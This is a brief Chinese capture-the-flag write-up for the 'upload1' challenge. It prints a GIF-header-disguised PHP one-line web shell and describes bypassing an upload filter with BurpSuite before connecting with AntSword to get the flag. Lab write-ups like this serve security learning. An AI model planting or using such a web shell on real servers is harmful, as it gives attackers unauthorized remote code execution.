攻防世界之upload1 题目 文件上传漏洞,所以上传一句话木马… GIF89a? <script language="php">eval($_POST['zyh']);</script> 一开始是直接上传php文件,但是发现它会被拦下 没关系,那就先改成文件后缀名,然后用BurpSuite抓包! 然后再用BurpSuite改一下后缀名就可以了(改成php文件) 最后再用蚁剑链接就可以得到Flag了